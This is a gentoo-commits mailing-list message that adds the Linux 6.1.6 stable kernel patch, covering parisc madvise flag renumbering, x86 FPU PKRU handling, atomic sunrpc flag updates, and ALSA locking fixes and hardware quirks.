@ 2023-01-14 13:48 Mike Pagano
From: Mike Pagano @ 2023-01-14 13:48 UTC
  To: gentoo-commits

commit:     5018f7dec55afd5e3c786f4a2b0c2977ec6ead0c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan 14 13:48:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan 14 13:48:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5018f7de

Linux patch 6.1.6

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 +
 1005_linux-6.1.6.patch | 861 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 865 insertions(+)

diff --git a/0000_README b/0000_README
index f47a205a..9e9a8d04 100644
--- a/0000_README
+++ b/0000_README
@@ -63,6 +63,10 @@ Patch:  1004_linux-6.1.5.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.5
 
+Patch:  1005_linux-6.1.6.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.6
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1005_linux-6.1.6.patch b/1005_linux-6.1.6.patch
new file mode 100644
index 00000000..ad3754e5
--- /dev/null
+++ b/1005_linux-6.1.6.patch
@@ -0,0 +1,861 @@
+diff --git a/Makefile b/Makefile
+index ddbd2fc917c59..19e8c6dec6e54 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 5
++SUBLEVEL = 6
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/parisc/include/uapi/asm/mman.h b/arch/parisc/include/uapi/asm/mman.h
+index 22133a6a506ef..68c44f99bc931 100644
+--- a/arch/parisc/include/uapi/asm/mman.h
++++ b/arch/parisc/include/uapi/asm/mman.h
+@@ -49,6 +49,19 @@
+ #define MADV_DONTFORK	10		/* don't inherit across fork */
+ #define MADV_DOFORK	11		/* do inherit across fork */
+ 
++#define MADV_MERGEABLE   12		/* KSM may merge identical pages */
++#define MADV_UNMERGEABLE 13		/* KSM may not merge identical pages */
++
++#define MADV_HUGEPAGE	14		/* Worth backing with hugepages */
++#define MADV_NOHUGEPAGE 15		/* Not worth backing with hugepages */
++
++#define MADV_DONTDUMP   16		/* Explicity exclude from the core dump,
++					   overrides the coredump filter bits */
++#define MADV_DODUMP	17		/* Clear the MADV_NODUMP flag */
++
++#define MADV_WIPEONFORK 18		/* Zero memory on fork, child only */
++#define MADV_KEEPONFORK 19		/* Undo MADV_WIPEONFORK */
++
+ #define MADV_COLD	20		/* deactivate these pages */
+ #define MADV_PAGEOUT	21		/* reclaim these pages */
+ 
+@@ -57,27 +70,13 @@
+ 
+ #define MADV_DONTNEED_LOCKED	24	/* like DONTNEED, but drop locked pages too */
+ 
+-#define MADV_MERGEABLE   65		/* KSM may merge identical pages */
+-#define MADV_UNMERGEABLE 66		/* KSM may not merge identical pages */
+-
+-#define MADV_HUGEPAGE	67		/* Worth backing with hugepages */
+-#define MADV_NOHUGEPAGE	68		/* Not worth backing with hugepages */
+-
+-#define MADV_DONTDUMP   69		/* Explicity exclude from the core dump,
+-					   overrides the coredump filter bits */
+-#define MADV_DODUMP	70		/* Clear the MADV_NODUMP flag */
+-
+-#define MADV_WIPEONFORK 71		/* Zero memory on fork, child only */
+-#define MADV_KEEPONFORK 72		/* Undo MADV_WIPEONFORK */
+-
+-#define MADV_COLLAPSE	73		/* Synchronous hugepage collapse */
++#define MADV_COLLAPSE	25		/* Synchronous hugepage collapse */
+ 
+ #define MADV_HWPOISON     100		/* poison a page for testing */
+ #define MADV_SOFT_OFFLINE 101		/* soft offline page for testing */
+ 
+ /* compatibility flags */
+ #define MAP_FILE	0
+-#define MAP_VARIABLE	0
+ 
+ #define PKEY_DISABLE_ACCESS	0x1
+ #define PKEY_DISABLE_WRITE	0x2
+diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
+index 848b0702005d6..09a34b07f02e6 100644
+--- a/arch/parisc/kernel/sys_parisc.c
++++ b/arch/parisc/kernel/sys_parisc.c
+@@ -465,3 +465,31 @@ asmlinkage long parisc_inotify_init1(int flags)
+ 	flags = FIX_O_NONBLOCK(flags);
+ 	return sys_inotify_init1(flags);
+ }
++
++/*
++ * madvise() wrapper
++ *
++ * Up to kernel v6.1 parisc has different values than all other
++ * platforms for the MADV_xxx flags listed below.
++ * To keep binary compatibility with existing userspace programs
++ * translate the former values to the new values.
++ *
++ * XXX: Remove this wrapper in year 2025 (or later)
++ */
++
++asmlinkage notrace long parisc_madvise(unsigned long start, size_t len_in, int behavior)
++{
++	switch (behavior) {
++	case 65: behavior = MADV_MERGEABLE;	break;
++	case 66: behavior = MADV_UNMERGEABLE;	break;
++	case 67: behavior = MADV_HUGEPAGE;	break;
++	case 68: behavior = MADV_NOHUGEPAGE;	break;
++	case 69: behavior = MADV_DONTDUMP;	break;
++	case 70: behavior = MADV_DODUMP;	break;
++	case 71: behavior = MADV_WIPEONFORK;	break;
++	case 72: behavior = MADV_KEEPONFORK;	break;
++	case 73: behavior = MADV_COLLAPSE;	break;
++	}
++
++	return sys_madvise(start, len_in, behavior);
++}
+diff --git a/arch/parisc/kernel/syscalls/syscall.tbl b/arch/parisc/kernel/syscalls/syscall.tbl
+index 8a99c998da9bb..0e42fceb2d5e2 100644
+--- a/arch/parisc/kernel/syscalls/syscall.tbl
++++ b/arch/parisc/kernel/syscalls/syscall.tbl
+@@ -131,7 +131,7 @@
+ 116	common	sysinfo			sys_sysinfo			compat_sys_sysinfo
+ 117	common	shutdown		sys_shutdown
+ 118	common	fsync			sys_fsync
+-119	common	madvise			sys_madvise
++119	common	madvise			parisc_madvise
+ 120	common	clone			sys_clone_wrapper
+ 121	common	setdomainname		sys_setdomainname
+ 122	common	sendfile		sys_sendfile			compat_sys_sendfile
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index d00db56a88682..9baa89a8877d0 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -391,8 +391,6 @@ int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf,
+ {
+ 	struct fpstate *kstate = gfpu->fpstate;
+ 	const union fpregs_state *ustate = buf;
+-	struct pkru_state *xpkru;
+-	int ret;
+ 
+ 	if (!cpu_feature_enabled(X86_FEATURE_XSAVE)) {
+ 		if (ustate->xsave.header.xfeatures & ~XFEATURE_MASK_FPSSE)
+@@ -406,16 +404,15 @@ int fpu_copy_uabi_to_guest_fpstate(struct fpu_guest *gfpu, const void *buf,
+ 	if (ustate->xsave.header.xfeatures & ~xcr0)
+ 		return -EINVAL;
+ 
+-	ret = copy_uabi_from_kernel_to_xstate(kstate, ustate);
+-	if (ret)
+-		return ret;
++	/*
++	 * Nullify @vpkru to preserve its current value if PKRU's bit isn't set
++	 * in the header.  KVM's odd ABI is to leave PKRU untouched in this
++	 * case (all other components are eventually re-initialized).
++	 */
++	if (!(ustate->xsave.header.xfeatures & XFEATURE_MASK_PKRU))
++		vpkru = NULL;
+ 
+-	/* Retrieve PKRU if not in init state */
+-	if (kstate->regs.xsave.header.xfeatures & XFEATURE_MASK_PKRU) {
+-		xpkru = get_xsave_addr(&kstate->regs.xsave, XFEATURE_PKRU);
+-		*vpkru = xpkru->pkru;
+-	}
+-	return 0;
++	return copy_uabi_from_kernel_to_xstate(kstate, ustate, vpkru);
+ }
+ EXPORT_SYMBOL_GPL(fpu_copy_uabi_to_guest_fpstate);
+ #endif /* CONFIG_KVM */
+diff --git a/arch/x86/kernel/fpu/regset.c b/arch/x86/kernel/fpu/regset.c
+index 75ffaef8c2991..6d056b68f4ed7 100644
+--- a/arch/x86/kernel/fpu/regset.c
++++ b/arch/x86/kernel/fpu/regset.c
+@@ -167,7 +167,7 @@ int xstateregs_set(struct task_struct *target, const struct user_regset *regset,
+ 	}
+ 
+ 	fpu_force_restore(fpu);
+-	ret = copy_uabi_from_kernel_to_xstate(fpu->fpstate, kbuf ?: tmpbuf);
++	ret = copy_uabi_from_kernel_to_xstate(fpu->fpstate, kbuf ?: tmpbuf, &target->thread.pkru);
+ 
+ out:
+ 	vfree(tmpbuf);
+diff --git a/arch/x86/kernel/fpu/signal.c b/arch/x86/kernel/fpu/signal.c
+index 91d4b6de58abe..558076dbde5bf 100644
+--- a/arch/x86/kernel/fpu/signal.c
++++ b/arch/x86/kernel/fpu/signal.c
+@@ -396,7 +396,7 @@ static bool __fpu_restore_sig(void __user *buf, void __user *buf_fx,
+ 
+ 	fpregs = &fpu->fpstate->regs;
+ 	if (use_xsave() && !fx_only) {
+-		if (copy_sigframe_from_user_to_xstate(fpu->fpstate, buf_fx))
++		if (copy_sigframe_from_user_to_xstate(tsk, buf_fx))
+ 			return false;
+ 	} else {
+ 		if (__copy_from_user(&fpregs->fxsave, buf_fx,
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index c2dde46a538e7..714166cc25f2f 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1200,8 +1200,36 @@ static int copy_from_buffer(void *dst, unsigned int offset, unsigned int size,
+ }
+ 
+ 
++/**
++ * copy_uabi_to_xstate - Copy a UABI format buffer to the kernel xstate
++ * @fpstate:	The fpstate buffer to copy to
++ * @kbuf:	The UABI format buffer, if it comes from the kernel
++ * @ubuf:	The UABI format buffer, if it comes from userspace
++ * @pkru:	The location to write the PKRU value to
++ *
++ * Converts from the UABI format into the kernel internal hardware
++ * dependent format.
++ *
++ * This function ultimately has three different callers with distinct PKRU
++ * behavior.
++ * 1.	When called from sigreturn the PKRU register will be restored from
++ *	@fpstate via an XRSTOR. Correctly copying the UABI format buffer to
++ *	@fpstate is sufficient to cover this case, but the caller will also
++ *	pass a pointer to the thread_struct's pkru field in @pkru and updating
++ *	it is harmless.
++ * 2.	When called from ptrace the PKRU register will be restored from the
++ *	thread_struct's pkru field. A pointer to that is passed in @pkru.
++ *	The kernel will restore it manually, so the XRSTOR behavior that resets
++ *	the PKRU register to the hardware init value (0) if the corresponding
++ *	xfeatures bit is not set is emulated here.
++ * 3.	When called from KVM the PKRU register will be restored from the vcpu's
++ *	pkru field. A pointer to that is passed in @pkru. KVM hasn't used
++ *	XRSTOR and hasn't had the PKRU resetting behavior described above. To
++ *	preserve that KVM behavior, it passes NULL for @pkru if the xfeatures
++ *	bit is not set.
++ */
+ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+-			       const void __user *ubuf)
++			       const void __user *ubuf, u32 *pkru)
+ {
+ 	struct xregs_state *xsave = &fpstate->regs.xsave;
+ 	unsigned int offset, size;
+@@ -1250,6 +1278,20 @@ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+ 		}
+ 	}
+ 
++	if (hdr.xfeatures & XFEATURE_MASK_PKRU) {
++		struct pkru_state *xpkru;
++
++		xpkru = __raw_xsave_addr(xsave, XFEATURE_PKRU);
++		*pkru = xpkru->pkru;
++	} else {
++		/*
++		 * KVM may pass NULL here to indicate that it does not need
++		 * PKRU updated.
++		 */
++		if (pkru)
++			*pkru = 0;
++	}
++
+ 	/*
+ 	 * The state that came in from userspace was user-state only.
+ 	 * Mask all the user states out of 'xfeatures':
+@@ -1268,9 +1310,9 @@ static int copy_uabi_to_xstate(struct fpstate *fpstate, const void *kbuf,
+  * Convert from a ptrace standard-format kernel buffer to kernel XSAVE[S]
+  * format and copy to the target thread. Used by ptrace and KVM.
+  */
+-int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf)
++int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru)
+ {
+-	return copy_uabi_to_xstate(fpstate, kbuf, NULL);
++	return copy_uabi_to_xstate(fpstate, kbuf, NULL, pkru);
+ }
+ 
+ /*
+@@ -1278,10 +1320,10 @@ int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf)
+  * XSAVE[S] format and copy to the target thread. This is called from the
+  * sigreturn() and rt_sigreturn() system calls.
+  */
+-int copy_sigframe_from_user_to_xstate(struct fpstate *fpstate,
++int copy_sigframe_from_user_to_xstate(struct task_struct *tsk,
+ 				      const void __user *ubuf)
+ {
+-	return copy_uabi_to_xstate(fpstate, NULL, ubuf);
++	return copy_uabi_to_xstate(tsk->thread.fpu.fpstate, NULL, ubuf, &tsk->thread.pkru);
+ }
+ 
+ static bool validate_independent_components(u64 mask)
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 5ad47031383b5..a4ecb04d8d646 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -46,8 +46,8 @@ extern void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 				      u32 pkru_val, enum xstate_copy_mode copy_mode);
+ extern void copy_xstate_to_uabi_buf(struct membuf to, struct task_struct *tsk,
+ 				    enum xstate_copy_mode mode);
+-extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf);
+-extern int copy_sigframe_from_user_to_xstate(struct fpstate *fpstate, const void __user *ubuf);
++extern int copy_uabi_from_kernel_to_xstate(struct fpstate *fpstate, const void *kbuf, u32 *pkru);
++extern int copy_sigframe_from_user_to_xstate(struct task_struct *tsk, const void __user *ubuf);
+ 
+ 
+ extern void fpu__init_cpu_xstate(void);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 34d1cd5883fbb..c7329523a10f1 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -928,7 +928,7 @@ nfsd4_read(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	 * the client wants us to do more in this compound:
+ 	 */
+ 	if (!nfsd4_last_compound_op(rqstp))
+-		__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++		clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	/* check stateid */
+ 	status = nfs4_preprocess_stateid_op(rqstp, cstate, &cstate->current_fh,
+@@ -2615,12 +2615,11 @@ nfsd4_proc_compound(struct svc_rqst *rqstp)
+ 	cstate->minorversion = args->minorversion;
+ 	fh_init(current_fh, NFS4_FHSIZE);
+ 	fh_init(save_fh, NFS4_FHSIZE);
+-
+ 	/*
+ 	 * Don't use the deferral mechanism for NFSv4; compounds make it
+ 	 * too hard to avoid non-idempotency problems.
+ 	 */
+-	__clear_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	clear_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+ 
+ 	/*
+ 	 * According to RFC3010, this takes precedence over all other errors.
+@@ -2742,7 +2741,7 @@ encode_op:
+ out:
+ 	cstate->status = status;
+ 	/* Reset deferral mechanism for RPC deferrals */
+-	__set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 78849646fe832..8377e14b8fba9 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2464,7 +2464,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	argp->rqstp->rq_cachetype = cachethis ? RC_REPLBUFF : RC_NOCACHE;
+ 
+ 	if (readcount > 1 || max_reply > PAGE_SIZE - auth_slack)
+-		__clear_bit(RQ_SPLICE_OK, &argp->rqstp->rq_flags);
++		clear_bit(RQ_SPLICE_OK, &argp->rqstp->rq_flags);
+ 
+ 	return true;
+ }
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893c..0c214af99085d 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -892,13 +892,17 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-12 array-bounds globally.
++# Currently, disable gcc-11,12 array-bounds globally.
+ # We may want to target only particular configurations some day.
++config GCC11_NO_ARRAY_BOUNDS
++	def_bool y
++
+ config GCC12_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+ 	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
+ 
+ #
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 4a27dfb1ba0fa..c82532e206992 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1132,6 +1132,11 @@ skip:
+ 			return -ENOENT;
+ 		}
+ 
++		if (new && new->ops == &noqueue_qdisc_ops) {
++			NL_SET_ERR_MSG(extack, "Cannot assign noqueue to a class");
++			return -EINVAL;
++		}
++
+ 		err = cops->graft(parent, cl, new, &old, extack);
+ 		if (err)
+ 			return err;
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index 9a5db285d4ae5..bdc34ea0d939d 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -900,7 +900,7 @@ unwrap_integ_data(struct svc_rqst *rqstp, struct xdr_buf *buf, u32 seq, struct g
+ 	 * rejecting the server-computed MIC in this somewhat rare case,
+ 	 * do not use splice with the GSS integrity service.
+ 	 */
+-	__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	/* Did we already verify the signature on the original pass through? */
+ 	if (rqstp->rq_deferred)
+@@ -972,7 +972,7 @@ unwrap_priv_data(struct svc_rqst *rqstp, struct xdr_buf *buf, u32 seq, struct gs
+ 	int pad, remaining_len, offset;
+ 	u32 rseqno;
+ 
+-	__clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	clear_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 
+ 	priv_len = svc_getnl(&buf->head[0]);
+ 	if (rqstp->rq_deferred) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 149171774bc63..24577d1b99079 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1244,10 +1244,10 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
+ 		goto err_short_len;
+ 
+ 	/* Will be turned off by GSS integrity and privacy services */
+-	__set_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
++	set_bit(RQ_SPLICE_OK, &rqstp->rq_flags);
+ 	/* Will be turned off only when NFSv4 Sessions are used */
+-	__set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
+-	__clear_bit(RQ_DROPME, &rqstp->rq_flags);
++	set_bit(RQ_USEDEFERRAL, &rqstp->rq_flags);
++	clear_bit(RQ_DROPME, &rqstp->rq_flags);
+ 
+ 	svc_putu32(resv, rqstp->rq_xid);
+ 
+diff --git a/net/sunrpc/svc_xprt.c b/net/sunrpc/svc_xprt.c
+index 2106003645a78..c2ce125380080 100644
+--- a/net/sunrpc/svc_xprt.c
++++ b/net/sunrpc/svc_xprt.c
+@@ -1238,7 +1238,7 @@ static struct cache_deferred_req *svc_defer(struct cache_req *req)
+ 	trace_svc_defer(rqstp);
+ 	svc_xprt_get(rqstp->rq_xprt);
+ 	dr->xprt = rqstp->rq_xprt;
+-	__set_bit(RQ_DROPME, &rqstp->rq_flags);
++	set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 
+ 	dr->handle.revisit = svc_revisit;
+ 	return &dr->handle;
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index 2fc98fea59b46..e833103f46291 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -298,9 +298,9 @@ static void svc_sock_setbufsize(struct svc_sock *svsk, unsigned int nreqs)
+ static void svc_sock_secure_port(struct svc_rqst *rqstp)
+ {
+ 	if (svc_port_is_privileged(svc_addr(rqstp)))
+-		__set_bit(RQ_SECURE, &rqstp->rq_flags);
++		set_bit(RQ_SECURE, &rqstp->rq_flags);
+ 	else
+-		__clear_bit(RQ_SECURE, &rqstp->rq_flags);
++		clear_bit(RQ_SECURE, &rqstp->rq_flags);
+ }
+ 
+ /*
+@@ -1008,9 +1008,9 @@ static int svc_tcp_recvfrom(struct svc_rqst *rqstp)
+ 	rqstp->rq_xprt_ctxt   = NULL;
+ 	rqstp->rq_prot	      = IPPROTO_TCP;
+ 	if (test_bit(XPT_LOCAL, &svsk->sk_xprt.xpt_flags))
+-		__set_bit(RQ_LOCAL, &rqstp->rq_flags);
++		set_bit(RQ_LOCAL, &rqstp->rq_flags);
+ 	else
+-		__clear_bit(RQ_LOCAL, &rqstp->rq_flags);
++		clear_bit(RQ_LOCAL, &rqstp->rq_flags);
+ 
+ 	p = (__be32 *)rqstp->rq_arg.head[0].iov_base;
+ 	calldir = p[1];
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_transport.c b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+index 199fa012f18a8..94b20fb471356 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_transport.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_transport.c
+@@ -602,7 +602,7 @@ static int svc_rdma_has_wspace(struct svc_xprt *xprt)
+ 
+ static void svc_rdma_secure_port(struct svc_rqst *rqstp)
+ {
+-	__set_bit(RQ_SECURE, &rqstp->rq_flags);
++	set_bit(RQ_SECURE, &rqstp->rq_flags);
+ }
+ 
+ static void svc_rdma_kill_temp_xprt(struct svc_xprt *xprt)
+diff --git a/sound/core/control.c b/sound/core/control.c
+index 50e7ba66f1876..82aa1af1d1d87 100644
+--- a/sound/core/control.c
++++ b/sound/core/control.c
+@@ -1203,14 +1203,19 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 	const u32 pattern = 0xdeadbeef;
+ 	int ret;
+ 
++	down_read(&card->controls_rwsem);
+ 	kctl = snd_ctl_find_id(card, &control->id);
+-	if (kctl == NULL)
+-		return -ENOENT;
++	if (kctl == NULL) {
++		ret = -ENOENT;
++		goto unlock;
++	}
+ 
+ 	index_offset = snd_ctl_get_ioff(kctl, &control->id);
+ 	vd = &kctl->vd[index_offset];
+-	if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_READ) || kctl->get == NULL)
+-		return -EPERM;
++	if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_READ) || kctl->get == NULL) {
++		ret = -EPERM;
++		goto unlock;
++	}
+ 
+ 	snd_ctl_build_ioff(&control->id, kctl, index_offset);
+ 
+@@ -1220,7 +1225,7 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 	info.id = control->id;
+ 	ret = __snd_ctl_elem_info(card, kctl, &info, NULL);
+ 	if (ret < 0)
+-		return ret;
++		goto unlock;
+ #endif
+ 
+ 	if (!snd_ctl_skip_validation(&info))
+@@ -1230,7 +1235,7 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 		ret = kctl->get(kctl, control);
+ 	snd_power_unref(card);
+ 	if (ret < 0)
+-		return ret;
++		goto unlock;
+ 	if (!snd_ctl_skip_validation(&info) &&
+ 	    sanity_check_elem_value(card, control, &info, pattern) < 0) {
+ 		dev_err(card->dev,
+@@ -1238,8 +1243,11 @@ static int snd_ctl_elem_read(struct snd_card *card,
+ 			control->id.iface, control->id.device,
+ 			control->id.subdevice, control->id.name,
+ 			control->id.index);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto unlock;
+ 	}
++unlock:
++	up_read(&card->controls_rwsem);
+ 	return ret;
+ }
+ 
+@@ -1253,9 +1261,7 @@ static int snd_ctl_elem_read_user(struct snd_card *card,
+ 	if (IS_ERR(control))
+ 		return PTR_ERR(control);
+ 
+-	down_read(&card->controls_rwsem);
+ 	result = snd_ctl_elem_read(card, control);
+-	up_read(&card->controls_rwsem);
+ 	if (result < 0)
+ 		goto error;
+ 
+diff --git a/sound/pci/hda/cs35l41_hda.c b/sound/pci/hda/cs35l41_hda.c
+index e5f0549bf06d0..a5b10a6a33a5e 100644
+--- a/sound/pci/hda/cs35l41_hda.c
++++ b/sound/pci/hda/cs35l41_hda.c
+@@ -598,8 +598,8 @@ static int cs35l41_system_suspend(struct device *dev)
+ 	dev_dbg(cs35l41->dev, "System Suspend\n");
+ 
+ 	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH) {
+-		dev_err(cs35l41->dev, "System Suspend not supported\n");
+-		return -EINVAL;
++		dev_err_once(cs35l41->dev, "System Suspend not supported\n");
++		return 0; /* don't block the whole system suspend */
+ 	}
+ 
+ 	ret = pm_runtime_force_suspend(dev);
+@@ -624,8 +624,8 @@ static int cs35l41_system_resume(struct device *dev)
+ 	dev_dbg(cs35l41->dev, "System Resume\n");
+ 
+ 	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH) {
+-		dev_err(cs35l41->dev, "System Resume not supported\n");
+-		return -EINVAL;
++		dev_err_once(cs35l41->dev, "System Resume not supported\n");
++		return 0; /* don't block the whole system resume */
+ 	}
+ 
+ 	if (cs35l41->reset_gpio) {
+@@ -647,6 +647,15 @@ static int cs35l41_system_resume(struct device *dev)
+ 	return ret;
+ }
+ 
++static int cs35l41_runtime_idle(struct device *dev)
++{
++	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
++
++	if (cs35l41->hw_cfg.bst_type == CS35L41_EXT_BOOST_NO_VSPK_SWITCH)
++		return -EBUSY; /* suspend not supported yet on this model */
++	return 0;
++}
++
+ static int cs35l41_runtime_suspend(struct device *dev)
+ {
+ 	struct cs35l41_hda *cs35l41 = dev_get_drvdata(dev);
+@@ -1536,7 +1545,8 @@ void cs35l41_hda_remove(struct device *dev)
+ EXPORT_SYMBOL_NS_GPL(cs35l41_hda_remove, SND_HDA_SCODEC_CS35L41);
+ 
+ const struct dev_pm_ops cs35l41_hda_pm_ops = {
+-	RUNTIME_PM_OPS(cs35l41_runtime_suspend, cs35l41_runtime_resume, NULL)
++	RUNTIME_PM_OPS(cs35l41_runtime_suspend, cs35l41_runtime_resume,
++		       cs35l41_runtime_idle)
+ 	SYSTEM_SLEEP_PM_OPS(cs35l41_system_suspend, cs35l41_system_resume)
+ };
+ EXPORT_SYMBOL_NS_GPL(cs35l41_hda_pm_ops, SND_HDA_SCODEC_CS35L41);
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 386dd9d9143f9..9ea633fe93393 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -1981,6 +1981,7 @@ static const struct snd_pci_quirk force_connect_list[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x870f, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x871a, "HP", 1),
+ 	SND_PCI_QUIRK(0x103c, 0x8711, "HP", 1),
++	SND_PCI_QUIRK(0x103c, 0x8715, "HP", 1),
+ 	SND_PCI_QUIRK(0x1462, 0xec94, "MS-7C94", 1),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", 1),
+ 	{}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 3794b522c2222..764eb07bbaff4 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9239,6 +9239,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0b1a, "Dell Precision 5570", ALC289_FIXUP_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1028, 0x0b37, "Dell Inspiron 16 Plus 7620 2-in-1", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1028, 0x0b71, "Dell Inspiron 16 Plus 7620", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0c03, "Dell Precision 5340", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0c19, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x0c1a, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x0c1b, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
+@@ -9406,6 +9407,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
